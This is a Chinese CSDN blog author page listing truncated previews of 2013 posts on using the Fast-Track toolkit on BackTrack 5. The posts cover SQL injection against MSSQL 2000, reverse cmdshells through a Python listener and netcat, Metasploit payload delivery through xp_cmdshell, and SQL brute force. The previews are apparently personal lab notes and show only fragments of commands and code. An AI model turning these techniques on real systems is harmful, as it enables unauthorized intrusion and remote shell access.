![](https://img-blog.csdnimg.cn/20201014180756780.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
fasttrack
feier7501
这个作者很懒,什么都没留下…
展开
-
MSSQL2K - SQL Injector - Query String Parameter Attack获得反向cmdshell
上次没有成功获得cmdshell,因为fasttrack没有这方面的代码,这次编写了server.py。原来的博客链接:http://blog.csdn.net/feier7501/article/details/9220495import socketHOST = ''PORT = 4444s = socket.socket(socket.AF_INET, socket原创 2013-07-07 16:55:25 · 1572 阅读 · 0 评论 -
MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell
fasttrack操作:root@bt:~# cd /pentest/exploits/fasttrack/root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i****************************************************** Performing dependency checks...原创 2013-07-08 20:23:10 · 1113 阅读 · 0 评论 -
SQL Injector - POST Parameter Attack
login.jsp如下:<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>Register user username: password: bt5上操作如下:root@bt:/pentest/exploits/fasttrack原创 2013-07-08 21:32:47 · 1326 阅读 · 0 评论 -
SQL Injector - GET Manual Setup Binary Payload Attack
bt5上操作: ***************************************************************** ** ** ** Fast-Track - A new beginning...原创 2013-07-08 21:43:26 · 1002 阅读 · 0 评论 -
(a)ttempt SQL Ping and Auto Quick Brute Force(未完待续)
在BT5R3上,需要修改文件/pentest/exploits/fasttrack/config/fasttrack_config,改为:METASPLOIT_PATH=/opt/metasploit/app/否则会找不到msfcli。然后进入fasttrack进行操作:root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i原创 2013-07-08 23:06:58 · 1087 阅读 · 0 评论 -
(a)ttempt SQL Ping and Auto Quick Brute Force 续2——原因
今晚再次调试,发现生成的h2b.exe无法运行,这个文件用来把hex转换成bin,而且后面的代码,似乎也有问题: print "Metasploit payload delivered.." print "Converting our payload to binary, this may take a few..." query5=("""xp_c原创 2013-07-10 22:49:55 · 873 阅读 · 0 评论 -
fasttrack的SQLPwnage(失败)
这次也是失败的,操作如下:root@bt:/pentest/exploits/fasttrack# ./fast-track.py -iFast-Track Main Menu: 1. Fast-Track Updates 2. Autopwn Automation 3. Nmap Scripting Engine 4. Microsoft SQL原创 2013-07-11 21:08:24 · 1003 阅读 · 0 评论 -
MSSQL2K - SQL Injector - Query String Parameter Attack
操作如下:root@root:/pentest/exploits/fasttrack# ./fast-track.py -i****************************************************** Performing dependency checks... *******************************************原创 2013-07-01 23:11:52 · 1064 阅读 · 0 评论